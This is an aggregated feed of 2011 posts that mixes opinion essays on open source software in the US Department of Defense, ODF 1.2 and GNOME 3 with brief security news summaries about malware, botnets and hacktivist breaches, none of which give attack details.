We hope you like this year's designs and find the data interesting.
Kaspersky Lab malware researcher Tillmann Werner joins Ryan Naraine to talk about the threat from peer-to-peer botnets. The discussions range from botnet-takedown activities and the ongoing cat-and-mouse games to cope with the botnet menace.
Please protest the proposed STOP (Stop Online Piracy Act) and PIPA (PROTECT IP Act). The English Wikipedia is blacked out today, and many other websites (like Google) are trying to awareness of these hideous proposed laws. The EFF has more information about PIPA and SOPA. Yes, the U.S. House has temporarily suspended its work, but that is just temporary; it needs to be clear that such egregious laws must never be accepted.
Wikimedia Foundation board member Kat Walsh puts it very well: “We [the Wikimedia Foundation and its project participants] depend on a legal infrastructure that makes it possible for us to operate. And we depend on a legal infrastructure that also allows other sites to host user-contributed material, both information and expression. For the most part, Wikimedia projects are organizing and summarizing and collecting the world’s knowledge. We’re putting it in context, and showing people how to make sense of it. But that knowledge has to be published somewhere for anyone to find and use it. Where it can be censored without due process, it hurts the speaker, the public, and Wikimedia. Where you can only speak if you have sufficient resources to fight legal challenges, or, if your views are pre-approved by someone who does, the same narrow set of ideas already popular will continue to be all anyone has meaningful access to.”
The U.S. Department of Defense (DoD) has changed one of its key software development documents, making it even clearer that it’s okay to use open source software (OSS) in the DoD. This is good news beyond the DoD; if the US DoD can widely accept OSS, then maybe other organizations (that you deal with) can too.
That key document has the long title “Application Security & Development (AppDev) Security Technical Implementation Guide (STIG),” aka the AppDev STIG. The AppDev STIG includes some guidelines for how to write secure software, and a checklist for use before you can deploy custom software in certain cases. In the past, many people thought that using OSS in the DoD required special permission, because they misunderstood some of DoD’s policies, and this misunderstanding had crept into the AppDev STIG. The good news is that this has been fixed.
Here’s the basic background.
Open source software (OSS) is software where anyone can read, modify, and redistribute the source code (its “blueprints”) in original or modified form. OSS is widely used and developed in industry; some popular OSS includes the Linux kernel (the basis of Google’s Android), the Firefox web browser, and Apache (the world’s most popular web server). You can get quantitative numbers about OSS at http://www.dwheeler.com/oss_fs_why.html. There is a lot of high-quality OSS, and OSS is often very inexpensive even when you include installation, training, and so on.
Unfortunately, previous versions of the AppDev STIG were often interpreted as saying that using OSS required special permission. This document matters; DoD Directive (DoDD) 8500.01E requires that “all IA and IA-enabled IT products incorporated into DoD information systems shall be configured in accordance with DoD-approved security configuration guidelines” and tasks DISA to develop the STIGs. It’s often difficult to get systems fielded unless they meet the STIGs.
AppDev STIG version 3 revision 1 (an older version) said:
(APP2090.1: CAT II) “The Program Manager will obtain DAA acceptance of risk for all open source, public domain, shareware, freeware, and other software products/libraries with no warranty and no source code review capability, but are required for mission accomplishment.”
(APP2090.2: CAT II): “The Designer will document for DAA approval all open source, public domain, shareware, freeware, and other software products/libraries with limited or no warranty, but are required for mission accomplishment.”
Many people interpreted this as saying that any use of OSS required special permission. But where would the Defense Information Systems Agency (DISA), the author of the AppDev STIG, get that idea? Well, it turns out that this is a common misunderstanding of DoD policy. DoD Instruction 8500.2, February 6, 2003 has a control called “DCPD-1 Public Domain Software Controls” (http://www.dtic.mil/whs/directives/corres/pdf/850002p.pdf), which starts with this text:
Binary or machine executable public domain software products and other software products with limited or no warranty such as those commonly known as freeware or shareware are not used in DoD information systems unless they are necessary for mission accomplishment and there are no alternative IT solutions available.
A lot of people stopped reading there; they saw that “freeware” required special permission, and since OSS can often be downloaded for free, they presumed that all OSS was “freeware.” They should have kept reading, because it then goes on to make it clear that OSS is not freeware:
Such products are assessed for information assurance impacts, and approved for use by the DAA. The assessment addresses the fact that such software products are difficult or impossible to review, repair, or extend, given that the Government does not have access to the original source code and there is no owner who could make such repairs on behalf of the Government…
This latter part makes it clear that software only requires special treatment if the government cannot review, repair, or extend the software. If the government can do these things, there’s no problem, and by definition OSS provides these rights. But a lot of people didn’t understand this.
This was such a common misunderstanding that in October 2009, the DoD CIO’s memo “Clarifying Guidance Regarding Open Source Software (OSS)” specifically stated (in Attachment 2, 2c) that this was a misunderstanding (http://dodcio.defense.gov/sites/oss/2009OSS.pdf). The DoD CIO later instructed DISA to update the AppDev STIG so this misunderstanding would be removed.
The latest AppDev STIG (Version 3, Release 4) has just fixed this (http://iase.disa.mil/stigs/app_security/app_sec/app_sec.html). The new STIG:
Two related points:
But the editorial gaff in the AppDev STIG, and the work on improving the wording of controls long term, shouldn’t detract from the main point.
The main point is:
Open Source Software (OSS) is now much easier to use in the DoD.
I’ve learned that Open Source for America (OSFA) has awarded me a 2011 Open Source Award - Individual Award for my work to advocate consideration of “open source software in the US Department of Defense (DoD)”. They specifically point to my papers Why Open Source Software / Free Software? Look at the Numbers! and Nearly all FLOSS is Commercial.
The winners of all the 2011 awards were:
Thanks so much, OSFA! I’m honored.
Hooray! Open Document Format for Office Applications (ODF or OpenDocument) Version 1.2 has been approved as an OASIS Standard. Finally, the world has a standard vendor-independent format for storing and exchanging ordinary office documents (particularly word processing documents, spreadsheets, and presentations) that you can edit.
Historically, people have only been able to exchange these documents if they use the same program, locking users into specific vendor products. In short, users often don’t really own the documents they create; they are often beholden to the developers of their tools. This is especially nasty for government documents; all governments have to choose some product, and whatever product they use implicitly forces their citizens to use the same product (whether they want to or not). Over time these documents can no longer be read, as products are upgraded or people change products, so this is also a disaster for archiving. We can read the Magna Carta more easily than some documents saved 30 years ago. Heck, we can read Sumerian writings more easily than some documents saved 30 years ago, and that is a scary thing. ODF provides us the possibility of actually exchanging documents, and reading archives, regardless of what program was used to create them. In short, people now have real freedom when they create and exchange normal office documents — they are no longer locked into a particular supplier or version of program.
Rob Weir has some of the highlights of version 1.2, and he has also written an overview of ODF.
For me, the highlight is OpenFormula. Previous versions of the specification could exchange spreadsheets, but did not standardize the format of recalculated formulas. I led the subcommittee in the ODF Technical Committee to nail down exactly how to recalculate formulas. The result: We now have a real spec. My sincere thanks to the many who helped make this possible. Feel free to see my 2011-05-28 post about the success of OpenFormula.
I’m sure that there will continue to be refinements for years to come; that is normal for a standard. In some sense this is after the fact; like many good standards, it was developed through the cooperation of many of the implementors. It is already implemented, at least in part, in many places, and I expect even more completed implementations soon.
The key, though, is that users can finally own the documents they create. That is a major step forward, for all of us.
I encourage all US citizens to sign this petition to the US White House to “direct the patent office to cease issuing software patents”. I believe software patents impede innovation (instead of helping it), and they have become a threat to the US economy. Many organizations involved in software are now spending lots of time fending off patent trolls, fighting patent lawsuits, or cannot safely solve problems due to patent thickets. The recently-passed “America Invents Act” (AIA) completely failed to deal with this fundamental problem.
Signing a petition won’t immediately solve anything. That’s not how it works. But repeatedly making the government aware that there’s a real problem is a good first step to solving a problem. In the US, the right of the people to petition their government is guaranteed by the first amendment of the US Constitution (“Congress shall make no law …. abridging… the right of the people peaceably to assemble, and to petition the Government for a redress of grievances”). Everyone is affected today by software, and so far the government has not effectively dealt with the problem. Please use this opportunity to make the government aware of a real problem.
Off-the-shelf (OTS) software is simply software that is ready-made and available for use. Even when you need a custom system, building it from many OTS components has many advantages, which is why everyone does it. OTS works because you can save money and time, increase quality, and increase innovation through resource pooling.
However, people can get easily confused by the many different ways that off-the-shelf (OTS) software can be maintained. Terminology varies, and there hasn’t been an obvious way to describe how these different approaches are related. In 2010 I chatted with several others about how to make this clearer, and then created a picture that I think clarifies things. My thanks to helpful critiques from Heather Burke and John Scott. So here’s the picture, followed by a discussion on what it means.
If OTS software is commercial, it’s commercial OTS (COTS) software. By U.S. law, any software is commercial if it is (1) sold, licensed, or leased to the public, and (2) has a non-governmental use. There are two kinds of COTS software: Open Source Software (OSS) and proprietary software. OSS, put briefly, is software whose licenses give users the freedom to run the program for any purpose, to study and modify the program, and to redistribute copies of either the original or modified program (without having to pay royalties to previous developers). Yes, practically all OSS is commercial.
OTS can also be retained and maintained internally by an organization. For example, the U.S. government develops and maintains some software internally. In the U.S. government world, such software often called government OTS (GOTS). This figure shows things from the point of view of the U.S. government, but if you work with some other organization, you can think of this figure with your organization in the place of the U.S. government. (Maybe this should be called “internal off-the-shelf” or “IOTS” instead!) The idea here is that any organization can have software that it controls internally, and view as internal OTS software, as well as the COTS software that is available to the public.
There are various reasons why the government should sometimes keep certain software in-house, e.g., because sole possession of the software gives the U.S. a distinct advantage over its adversaries. However, there is also considerable risk to the government if it tries to privately hold GOTS software within the government for too long. Technological advantage is usually fleeting. Often there is a commercially-developed item available to the public that begins to perform similar functions. As it matures, other organizations begin using this non-GOTS solution, potentially rendering the GOTS solution obsolete. Such cases often impose difficult decisions, as the government must determine if it will pay the heavy asymmetrical cost to switch, or if it will continue “as usual” with its now-obsolete GOTS systems (with high annual costs and limitations that may risk lives or missions).
Either COTS or GOTS may be maintained by a single maintainer or by a community. In community maintenance there is often a single organization who determines if proposals should be accepted, but the key here is that the work tends to be distributed among those affected. An Open GOTS (OGOTS) project is a GOTS project which uses multiple-organization collaborative development approaches to develop and maintain software, in a manner similar to OSS. Some people use the term “Government Open Source Software” (GOSS) instead of OGOTS (in particular, GOSS for Govies uses the term GOSS instead).
GOTS (including OGOTS) is basically a special case of “gated software” with development inside a government. However, governments are bigger than most companies, and (in democracies) they are supposed to serve all of their citizenry, and those factors make them rather different than most other gated communities. Community development of proprietary software (“gated software”) outside governments is less common, but it can happen (historically some parts of Unix were developed this way). The term Open Technology Development (OTD) involves community development among government users (in the case of government developers), and thus it includes both OSS and OGOTS (aka GOSS).
I should note that I have a broad view of maintenance. I’ve often said that there is only one program — “Hello, World” — and that the rest is maintenance. That’s overstated for effect, but I believe there is a lot of truth in that statement.
This figure, and some of the text above, is in section 1.3 of the paper Open Technology Development (OTD): Lessons Learned & Best Practices for Military Software (also available via MIL-OSS), which is released under the Creative Commons BY-SA license. If you’re interested in more, please see the paper! The figure and some of the text are also part of “Software is a Renewable Military Resource” by John Scott, Dr. David A. Wheeler, Mark Lucas, and J.C. Herz, Journal of Software Technology, February 2011, Vol. 14, Number 1.
I hope this figure makes it easier to understand the different approaches for maintaining off-the-shelf (OTS) software.
Asking “who has the copyright?” for intellectual works (like software, documents, and data) is almost always the wrong question to ask. Instead, ask “what rights do I have (or can I get)?” and “do those rights let me do what I want to do?”. In a vast number of situations, those are the right questions to ask instead. Even people who should know better can fall into this subtle trap!
This became obvious to me when it was revealed that even the smart people at the Apache Software Foundation fell into this. In the recent Accumulo proposal, there were unnecessary copyright hurdles because Apache was unnecessarily asking for a copyright transfer, instead of the necessary rights (in this case, there was no copyright to transfer!).
So I’ve justed posted Ask Not Who Holds the Copyright, which I hope will clear this up.
I recently went to the MIL-OSS
(“military open source software”)
2011 Working Group (WG) /
Conference in Atlanta, Georgia.
Topics included the open prosthetics project,
releasing government-funded software as OSS,
replacing MATLAB with Python,
the “Open Technology Dossier Protocol” (OTDP),
confining users using SELinux,
an explanation of DoD policies on OSS,
Charlie Schweik’s study on what makes a success OSS project,
and more.
Some people started developing a walkie-talkie Android app at the conference.
Here’s a summary of the conference, if you’re curious.
First, a few general comments. If this conference is any guide, it is slowly getting easier to get OSS into government (including military) systems. OSS is already used in many places, but it’s often “don’t ask, don’t tell”, and there are still lots of silly bureaucratic barriers that prevent the use of OSS where it should be used or at least considered. But there were many success stories, with slide titles like “how we succeeded”.
Although the conference had serious purposes, it was all done in good humor. All participants got the MIL-OSS poster of Uncle Sam (saying “I want YOU to Open Source!”). The theme of the conference was the WarGames movie; the first finder for each of the WarGames Easter eggs would get a silly 80s-style prize (such as an Atari T-shirt).
As the MIL-OSS 2011 presentations list shows, I gave three talks:
The conference was complicated by the recent passing of Hurricane Irene. The area itself was fine, but some people had trouble flying in. The first day’s whole schedule was delayed so speakers could arrive (using rescheduled flights). That was probably the best thing to do in the circumstance — it was basically like a temporary time zone change — but it meant that one of my talks that day (Why the GPL Might not Destroy the Universe) was at 9:10pm. And I wasn’t even the last speaker. Eeeek. Around 15 speakers had still not arrived when the conference arrived, but all but one managed to get there before they had to speak.
Here are few notes on the talks:
Many discussions revolved around the problems of getting authentication/authorization working without passwords, in particular using the ID cards now widely used by nearly all western governments (such as DoD CAC cards). Although things can work sometimes, it’s incredibly painful to get them to work on any system (OSS or not), and they are fragile. Dmitri Pal (Red Hat)’s talk “CAC and Kerberos From Vision to Reality” discussed some of the problems and ways to possibly make it better. The OpenSSH developers are actively hostile to the X.509 standard that everyone uses for identity certificates; I agree with the OpenSSH folks that X.509 is clunky, but that is what everyone uses, and not supporting X.509 means that openssh is useless for them. Every card reader is incompatible with the others, so every time a new model comes out, drivers have to be written and it often doesn’t work anyway (compare that to USB keyboards, which “just work” every time even through KVM switches). I think some group needs to be formed, maybe a “Simple Authorization without passwords” group, with the goal of setting standards and building OSS components so that systems by default (maybe by installing one package) can trivially use PKI and other systems and have it “just work” every time. No matter that client, server (relying party), or third-party authenticator/authorization server is in use.
If you’re interested in more of my personal thoughts about OSS and the U.S. Department of Defense (DoD), also see FLOSS Weekly #160, the interview of David A. Wheeler by Randal Schwartz and Simon Phipps. Good general sites for more info are the MIL-OSS website and the DoD CIO Free Open Source Software (FOSS) site.
There’s more to be done, but a lot is already happening.
So the biggest PC maker is getting ready to dump its PC business. That's the gist of HP kills tablets, confirms PC spin-off plans, in Computerworld. more>>
Today we're happy to announce the release of the "We're In" app for Windows Phone.
We’re In makes organizing get- together’s, carpooling and trying to find people in a crowd a breeze. Any time you want to see where your friends are—We're In can help you. It's simple, invite your friends, and when they join, they'll see your location and you'll see theirs. When the invite expires, so does the shared location – no complicated process to worry about.
We’re In is a great way to save time and frustration when planning your roadtrip or meeting your friend at the mall – helping you connect with your friend faster. Let’s take a closer look at the new We’re In product features and how they work.
We’ve made We’re In super simple to use – all you need is your phone number to sign up. Simply invite your friends (via your contacts) to start sharing location info with each other including who, why, and how long:
Pick your friends from the contact list or enter their phone number, tell them what the plan is. At this point you can choose how long you want to share location info.
Your friends receive a text message with these details. They can use the app to join you or, for friends that don't have a Windows Phone, they can join from the mobile website via the invite.
Continue At Source
Today we are beginning to re-enable the ability to create new Linked IDs. This change is rolling out in the next couple days and should be complete this week.
For some customers – particularly power users – you’ve told us that it’s essential to be able to juggle multiple accounts. Over the last year we’ve added several powerful new ways to do this – specifically aliases and email aggregation (“POP aggregation), on top of existing features like “plus addresses”. Each of these is a great solution designed to help a different scenario:
As we have made these changes, we looked at how most people use Linked IDs and found that, for the most part, they were used to solve exactly these problems – managing multiple email addresses and accounts. In our major update last month, one of the things we did is turn off the ability to create new Linked IDs, instead encouraging use of our new features. However it became clear from listening to your feedback that there were many people who used Linked IDs for other reasons, and so we are making a change today to re-enable the creation of Linked IDs.
Full Story At Source
Many of you know what a huge Drupal fan I am, and while I am a bit heartbroken that I will not attend the upcoming DrupalCon London, happening August 22-26 in Croydon, I'd like to give the rest of you the skinny on DrupalCon so you can all go have fun without me. To that end, I got a few tidbits from Robert Castelo, one of DrupalCon's organizers. more>>
A centralized syslog server was one of the first true SysAdmin tasks that I was given as a Linux Administrator way back in 1997. My boss at the time wanted to pull in log files from various appliances and have me use regexp to search them for certain key words. At the time Linux was still in its infancy, and I had just been dabbling with it in my free time. more>>
eBay-style outsourcing site PeoplePerHour says a rival firm faked emails which claimed to be offering the company's customer database for sale.…
The 17th annual Readers' Choice Awards are under way! Voting will close on Sep. 2, 2011.
Please note: You are not required to vote in every category, please simply skip over a question if you wish.
Thank you for participating!
Your friends at Linux Journal
more>>
Supporters of the People for the Ethical Treatment of Animals (PETA) organisation may have embraced new measures in the fight for animal rights, allegedly releasing a malware-infected version of a dog-fighting app PETA wants banned.…
Security researchers have unearthed a piece of malware that mints a digital currency known as Bitcoins by harnessing the immense power of an infected machine's graphical processing units.…
Back in March of '09, I posted Get ready for fourth party services here, calling them "a classification for user-driven services" and "a place where a vast new marketplace can open up, serving customers first". more>>
I recently moved my personal website from GoDaddy to my home server. I have a business connection at my house, and my site gets little enough traffic that hosting at home on my static IP makes sense. Moving the files wasn't really difficult, I FTP'd them down from the old server, and SFTP'd them up to the new server. Moving the database was a bit more challenging, however.
more>>
An attack targeting sites running unpatched versions of the osCommerce web application kept growing virally this week, more than three weeks after a security firm warned it was being used to install malware on the computers of unsuspecting users.…
Please select the color of your car. If you have two different color cars, or a car that is multi-colored -- pick a color you feel speaks to your inner geekness the most. (If your color isn't listed, pick the closest. THERE IS NO "OTHER")
UPDATE: I added an option for those without cars. Because I give and give and give. ;o)
A support blog for alleged Pentagon hacker Gary McKinnon had its domain name hijacked on Friday morning.…
An error message on once dominant but now almost defunct social networking site MySpace early on Friday has been confused with a hack.…
Claims that both CDMA and 4G networks were compromised at the recent Defcon security event in Las Vegas have raised little surprise, but the vulnerability of handsets is hotly debated.…
There were fears of further outbreaks of violence on the streets yesterday when the UK's busiest motoring forum site, PistonHeads.com, disappeared offline.…
Research in Motion has squashed a nasty bug in its BlackBerry server software that allowed it to be commandeered when handset users received messages containing booby-trapped images.…
Package management in Linux is great, but unfortunately, it comes with a few cons. Granted, most distributions keep all your software, not just system software like Apple and Microsoft, updated. The downside is that software packages aren't always the latest versions. Whatever is in the repository is what you get. more>>
Politically motivated hacking crew TeaMp0isoN has teamed up with Anonymous in an attempt to storm the music charts.…
Android Trojan writers are trying more tricks to fool the unwary into downloading rogue applications with a new set of rogue applications.…
The website of Super Glue became bunged up with a malicious script earlier this week as part of a tricky problem that was only resolved on Wednesday.…
Scribus is designed for quality printing. Unlike a word processor, its output is not meant simply to be good enough for practical use, but to be fine-tuned until it is as close as possible to what you want. For this reason, printing is considerably more complicated in Scribus than in the office applications with which you may be familiar. more>>
The Chinese government claims it came under almost 500,000 cyberattacks last year, most of which it said originated outside the country.…
The Information Commissioner's Office is facing criticism today for its failure to punish online retailer Lush for losing 5,000 customer debit and credit card details…
Reported plans by Anonymous to attack Facebook on 5 November appear to be an elaborate hoax by an unknown source.…
A turf war is developing between rootkit-touting cybercrooks over control of infected PCs.…
Microsoft has released 13 updates that patch security holes in a wide range of its software offerings, including vulnerabilities rated critical in its Internet Explorer browser and Windows server operating systems.…
In the first part of this series I introduced SuperCollider3 and its most basic operations. Now let's make things a little more interesting by adding a little randomization, a neat GUI, and some MIDI control.
Creating A GUI more>>
RIM's corporate blog has been defaced with threats as part of a protest against the BlackBerry maker's plans to hand over information on London rioters to the police.…
Scammers are attempting to trick Firefox users into downloading backdoored software via spam emails that supposedly advertise an "update" to the open-source browser.…
Sweary celebrity chef Gordon Ramsay is suing members of his wife's family, alleging they used malware to gain illicit access to his business and personal email accounts.…
Tails is a live media Linux distro designed boot into a highly secure desktop environment. You may remember that we looked at a US government distro with similar aims a few months ago, but Tails is different because it is aimed at the privacy conscious “normal user” rather than government workers. more>>
A 10-year-old hacker has won the admiration of her adult peers for finding a previously unknown vulnerability in games on iOS and Android devices.…
Black Hat Apple may have built its most secure Mac operating system yet, but a prominent security consultancy is advising enterprise clients to steer clear of adopting large numbers of the machines.…
Recycling is something we all deal with, or at least should deal with, when it comes to technology. more>>
Networking giant Cisco has warned customers that a CD-ROM it supplied with its kit automatically took users to a site that was a known malware repository.…
Microsoft is fuelling up 13 bulletins for release next week, including an update that guards against critical flaws in Internet Explorer.…
Black Hat Independent security consultant Stefan Esser made waves earlier this year when a technique he developed for hacking iPhones was adopted by JailbreakMe and other mainstream jailbreaking services.…
Malware-slingers are tapping into the buzz around a new Harry Potter site to mount a variety of scams designed to either defraud, infect or otherwise con would-be victims.…
Members of Anonymous are developing a new attack tool as an alternative to the LOIC (Low Orbit Ion Cannon) DDoS utility.…
The number of apps on mobile marketplaces contaminated with malware grew from 80 to 400 during the first half of 2011, according to a study by Lookout Mobile Security.…
A researcher has discovered a flaw in software used to spy on government agencies and contractors that can alert security personnel that their networks have been infiltrated by the otherwise hard-to-detect programs.…
Black Hat Google has billed its Chrome operating system as a security breakthrough that's largely immune to the threats that have plagued traditional computers for decades. With almost nothing stored on its hard drive and no native applications, there's no sensitive data that can pilfered and it can't be commandeered when attackers exploit common software vulnerabilities.…
I’m a long-time user of Fedora and GNOME. GNOME 2 has served me well over the years, so I was interested in what the GNOME people were cooking for GNOME 3. Fedora 15 comes with the new GNOME 3 shell; since change can sometimes be good, I’ve tried to give the new GNOME 3 shell a fair trial.
But after giving GNOME 3 (especially GNOME shell) some time, I’ve decided that I hate the GNOME 3 shell as it’s currently implemented. It’s not just me; the list of people who have complaints about the GNOME 3 shell include Linus Torvalds, Dedoimedo (see also here), k3rnel.net (Juan “Nushio” Rodriguez), Martin Sourada, junger95, and others. LWN noted the problems of GNOME 3 shell way back. So many people are leaving GNOME 3, often moving to XFCE, that one person posted a poem titled “GNOME 3, Unity, and XFCE: The Mass Exodus”.
The GNOME 3 shell is beautiful. No doubt. But as far as I can tell, the developers concentrated on making it beautiful, cool and different, but as a consequence made it far less useful and efficient for people. Dedoimedo summarizes GNOME 3.0 shell as, “While it’s a very pretty and comely interface, it struck me as counterproductive, designed with a change for the sake of change.” In a different post Dedoimedo says, “Gnome 3 is a toy. A beautiful, aesthetic toy. But it is not a productivity item… I am not a child. My computer is not a toy. It’s a serious tool… Don’t mistake conservative for inefficient. I just want my efficiency.”.
Some developers have tried to fix its worst problems of GNOME 3 shell with extensions, and if GNOME developers work at it, I think they could change it into something useful. But most of these problems aren’t just maturity issues; GNOME 3 shell is broken by design. So I’m going to switch to XFCE so I can get work done, and perhaps try it again later if they’ve started to fix it. Thankfully, Fedora 15 makes it easy to switch to another desktop like XFCE, so I can keep on happily using Fedora.
So what’s wrong?
I’ve been trying to figure out why I hate GNOME 3 so much, and it comes down to two issues: (1) GNOME 3’s shell makes it much harder to do simple, common tasks, and (2) GNOME 3 shell often hides how to do tasks (it’s not “discoverable”). These are not just my opinions, lots of people say these kinds of things. k3rnel.net says, “Gnome’s ‘Simplicity’ is down right insulting to a computer enthusiast. It makes it impossible to do simple tasks that used to flow naturally, and it’s made dozens of bizarre ‘design decisions’, like hiding Power Off behind the ‘Alt’ key.” Let me give you examples of each of these issues.
First of all, GNOME 3 (particularly its default GNOME shell) creates a lot of extra steps and work to do simple tasks that used to be simpler. To run a program whose name you don’t know, you have go to the far top left to the hot spot (or press “LOGO”), move your mouse to the hideously hard-to-place (and not obvious) “Applications” word slightly down the right, then mouse to the far right to choose a category, then mouse back to choose it. That’s absurd; the corners of the screen are especially easy to get to, and they fail to use that fact when choosing non-favorite applications. Remarkably, there doesn’t seem to be a quick way to simply show the list of (organized) applications you can start; there’s not even a keyboard shortcut for “LOGO Applications”. Eek. This is a basic item; even Windows 95 was easier. Would it really have killed anyone to make moving to some other area (say, the bottom left corner) show the applications? And why are the categories on the far right, where they are least easy to get to and not where any other system puts them? (Yes, the favorites area lets you start some programs, but you have to find it the first time, and some of us use many programs.) Also, you can’t quickly alt-tab between arbitrary windows (Alt-tab only moves between apps, and the undiscoverable alt-` only moves between windows of the same app). GNOME shell makes it easy to do instant messaging, but it makes it harder to do everything else. Fail.
GNOME 3’s capabilities are not discoverable, either. To log off or change system settings you click on your name — and that’s already non-obvious. But it gets worse. To power off, you click on your name, then press the ALT key to display the power off option, then select it. How the heck would a normal user find out about this? The only obvious way to power down the system is to log out, then power off from the front. If you know an application name, pressing LOGO (aka WINDOWS) and typing its name is actually a nice feature, but that is not discoverable either. If you want a new process or window (like a new terminal window or file manager window), you have to know press control when you select its icon to start a new process (for Terminal, you can also start it and press shift+control+N, but that is not true for all programs). The need to press control isn’t discoverable (it’s also a terrible default; if I press a program icon, I want a new one; if I wanted an existing one I’d select its window instead). Fail.
There are some nice things about GNOME 3 shell. As I mentioned earlier, I like the ability to press LOGO start typing a program name (which you can then select) - that is nice. But even then, this is not discoverable; how would a user new to the interface know that they should press the LOGO button? This functionality is trivial to get in other desktop environments; I configured XFCE to provide the same functionality in less than a minute (in a way that is less pretty, but much easier for a human to use).
The implementors seem to think that new is automatically better. Rediculous. I don’t use computers to have the newest fad interface, I use them to get things done (and for the pleasure of using them). I will accept changes, but they should be obvious improvements. Every change just for its own sake imposes relearning costs, especially for people like me who use many different computers and interfaces, and especially if they make common operations harder. Non-discoverability is especially nasty; people don’t want to read manuals for basic GUI interfaces, they want to get things done.
I don’t think GNOME 3 is mature, either. For example, as of 2011-07-28, GNOME 3 does not support screensavers — it just shows a blank screen after a timeout. But the previous GNOME 2 had screensavers. Heck, Windows 3.0 (of 1993) did better than that; it had screensavers, and I’m sure there were screensavers before then.
I’ve tried to get used to it, because I wanted to give new ideas a chance. Different can be better! But so far, I’m not impressed. The code may be cleaner, and it may be pretty, but the user experience is currently lousy.
If you’re stuck using the GNOME 3 Shell, you basically must read the GNOME shell cheat sheet, because so much of what it does is un-intuitive, incompatible with everything else, and non-discoverable. Needing to read a manual to use a modern user interface is not a good sign.
You could try switching to the GNOME 3 fallback mode, as discussed by Dedoimedo and others. This turns on a more tradtional interface. Several people have declared that GNOME 3 fallback is better than GNOME shell itself. But I was not pleased; it’s not really well-supported, and it’s really not clear that this will be supported long term.
You can also try various tweaks, configurations, and additional packages to make GNOME 3 shell more tolerable. If you’re stuck with GNOME 3 shell, install and use gnome-tweak-tool; that helps. You should also install the Fedora gnome-shell-extensions-alternative-status-menu package, which lets you see “Power off” as an option.
But after trying all that, I decided that it’d be better to switch to another more productive and mature desktop environment. Obvious options are XFCE and KDE.
XFCE is a lightweight desktop environment, and is what I’ve chosen to use instead of the default GNOME 3 shell. I found out later that other people have switched to XFCE after trying and hating GNOME 3’s shell. XFCE doesn’t look as nice as GNOME 3, indeed, the GNOME 3 shell is really quite flashy by comparison. But the GNOME shell makes it hard for me to get anything done, and that’s more important.
I expect that it wouldn’t be hard for the developers to make it better; hopefully the GNOME folks will work to improve it. If many of GNOME 3’s problems are fixed, then I’ll be happy to try it again. But I’m in no hurry; XFCE works just fine.
I’m creating a new page on my website called Notes on Fedora so that I can record “how to” stuff, in case that others find it useful. For example, I’ve recorded how to turn on some stuff in XFCE to make it prettier. Enjoy!
If you’re interested in free/libre/open source software in government (particularly the U.S. federal government), there are two upcoming conferences you should consider.
One is Government Open Source Conference (GOSCON) 2011 on August 23, 2011. It will be held at the Washington Convention Center, Washington, DC.
The other is the Military Open Source Software (MIL-OSS) WG3 conference on August 30 - September 1, 2011. It will be held in Atlanta, Georgia.
I’ll be speaking at both. But don’t let that dissuade you :-).
Cybercrooks have begun using botnets of compromised machines to mine units of the Bitcoin virtual currency.…
A five-year operation targeting more than 70 global companies, governments and non-profit organisations was probably the work of an intelligence agency, according to McAfee.…
An attack that targets a popular online commerce application has infected almost 5 million webpages with scripts that attempt to install malware on their visitors' computers.…
Criminals have increased the functionality of Android Trojans with a new strain that is capable of recording, and not just logging, conversations on compromised smartphones.…
Scareware scammers are targeting credit card users with a new run of spam emails falsely warning recipients that their plastic has been blocked.…
More details have emerged of an e-commerce software flaw linked to the theft of credit card information from numerous websites.…
A bug involving the method Skype uses to integrate with Facebook creates a possible account-hijack risk, security watchers warn.…
F1 Driver Jenson Button brushed off an attack on his website late on Saturday night that falsely claimed he had been seriously injured in a car crash, and went on to win the Hungarian Grand Prix on Sunday.…
Hard on the heels of warnings that critical systems in America are vulnerable to Stuxnet-style attacks, a group of security researchers says SCADA systems and PLCs make prisons vulnerable to computer-based attacks.…
Members of the Anonymous hacking collective said they broke into the networks of Mantech International and stole internal documents belonging to the US government contractor.…
Facebook has joined Google and Mozilla in paying cash rewards to researchers who privately report vulnerabilities that could jeopardize the privacy or security of their users.…
Malware-peddling scumbags have developed a particularly sneaky banking Trojan that attempts to trick victims into transferring funds into bank accounts controlled by cybercrooks or their partners.…
The Australian branch of supermarket chain ALDI has withdrawn a range of hard drives from its stores following the discovery that the hardware was infected with malware.…
Personal information on as many as 35 million users of a South Korean social network site may have been exposed as the result of what has been described as the country's biggest ever hack attack.…
Security shortcomings in both ICQ instant messenger for Windows and the ICQ website create a possible mechanism for account hijacking, a security researcher warns.…
LiveJournal is weathering a massive web attack that has meant service disruptions for people who read and write the more than 16 million journals hosted on the community and blogging service.…
Software that allows drivers to remotely unlock and start automobiles using cell phones is vulnerable to hacks that allow attackers to do the same thing, sometimes from thousands of miles away, it was widely reported Wednesday.…
The security breach that targeted sensitive data relating to RSA's SecurID two-factor authentication product has cost parent company EMC $66m in the second quarter, The Washington Post has reported.…
German computer scientists have taken advantage of the powerful number-crunching abilities of graphics chips to demonstrate a practical attack on the encryption scheme in programmable chips.…
Update BET24.com warned customers on Monday that their personal data may have been exposed by a breach that took place in December 2009.…
The head of a group that helps the federal government ward off computer attacks abruptly resigned Friday, amid a spate of high-profile assaults hitting government agencies and contractors.…
Hacktivists have posted "secret documents" stolen from an Italian cybercrime unit.…
The best way to defend against most network vulnerabilities is to deal with the simplest attack vectors, according to Australia’s Defence Signals Directorate (DSD).…
Weekend Following the success of hijacked network Free Libyana, we took the opportunity to talk to some engineers about the complexity of lifting someone else's infrastructure, and discovered there isn't much.…
Hackers have created a fake tool especially designed to exploit the laziness of the most clueless and unskilled phishing fraudsters.…
Pharmaceutical giant Pfizer's Facebook page has been defaced by mischief makers.…
Japanese authorities have jailed a serial malware writer for two-and-a-half years over his latest creation.…
Phishing fraudsters have latched on to a new target, with attacks designed to gain compromised access to frequent flyer accounts.…
LulzSec has abandoned plans to release a cache of News International emails it claimed to have acquired during a redirection attack on The Sun website earlier this week. Instead the group says it plans to release select batches of the emails via a "partnership" with select media outlets, an approach akin to that applied by WikiLeaks to its controversial US diplomatic cable and war log releases last year.…
Canadian police have arrested a man accused of planting key-logging malware on hundreds of computers across the world.…
Google is issuing warnings to people whose computers are infected with a type of malware that manipulates search requests.…
The promised dump of its emails from News International by hacktivist group LulzSec failed to materialise on Tuesday. However a prominent affiliate of the group told El Reg that the release had only been delayed, rather than postponed.…
Chinese search giant Baidu has launched its own web browser, aping Google's Chrome with web applications and aspirations of becoming a desktop replacement.…
The hacktivists behind a hack on The Sun's website claim to have extracted an email archive which they plan to release later on Tuesday.…
Hackers claim to have broken into the UK fansite of Lady GaGa before extracting the names and email addresses of thousands of her fans.…
